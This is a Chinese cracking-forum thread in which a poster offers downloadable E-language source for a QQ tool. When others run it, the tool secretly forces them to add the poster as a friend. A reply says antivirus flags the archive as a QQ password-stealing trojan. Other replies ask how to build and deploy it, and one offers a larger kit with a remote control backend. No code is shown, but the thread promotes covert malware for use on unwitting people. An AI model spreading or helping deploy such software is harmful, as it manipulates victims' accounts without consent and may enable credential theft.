吾爱破解 - LCG - LSG |安卓破解|病毒分析|www.52pojie.cn

注册[Register]

QQ登录

只需一步,快速开始

[其他原创] 【引流软件】QQ后台隐藏强制加好友源码

Swagoo 发表于 2018-2-8 12:28

看见有人说这种东西都是存起来卖钱的,拿我分享一下后台的一个强制加好友的源码  
要运行就要下载易语言啊
源码自己做的 说是其他地方转载我只能说如有雷同敬请谅解
软件他不是强制加好友的  他是引流用的 就是输入自己的QQ号 别人运行加自己为好友!
下载易语言然后解压运行易语言源码就行了
源码下载: QQ.zip (899.34 KB, 下载次数: 635)

杀软报毒qq盗号木马(TrojanSpy/QQpassce)  发表于 2018-5-23 21:58

免费评分

活到老就学到老 + 1 + 1 谢谢@Thanks!
7393575 + 1 + 1 大兄弟能整个详细点的教程私发我吗?
hrbbuild + 1 + 1 我很赞同!
849929884 + 1 用心讨论,共获提升!
asd123asd00 + 1 + 1 生成成品有吗?没有下载易语言软件
青鸾火凤 -1 精易论坛源码,并且如果对方设置问题是加不了的
6113254 + 1 + 1 我这有完整的加人,加群,转发,连带php统计控制后台,有需要的可以联系Q82.
豫黄河 + 1 + 1 刚好我需要,正好你专业
寒蝉鸣泣之时 + 1 + 1 热心回复!
linhai0612 + 1 QQ9.0好像用不了
Quincy379 + 1 + 1 谢谢@Thanks!
byjimo + 1 + 1 用心讨论,共获提升!

发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。

guer 发表于 2018-2-8 17:20
要运行就要下载易语言啊,别人运行加自己为好友!
想叫别人装上易语言,再运行加你?这可能吗?
hycq120 发表于 2018-2-8 12:38
萌萌哒的小白 发表于 2018-2-8 13:00
445go 发表于 2018-2-8 12:36
厉害了   
hycq120 发表于 2018-2-8 12:39
楼主这个有没有教程?源码我怎么搭建
Quincy379 发表于 2018-2-8 12:50
感谢,学习一下!
CNLibrary 发表于 2018-2-8 12:51
还有这东西? 关键怎么用呀?
小菜鸟灬好菜 发表于 2018-2-8 12:51
谢谢楼主分享,学习一下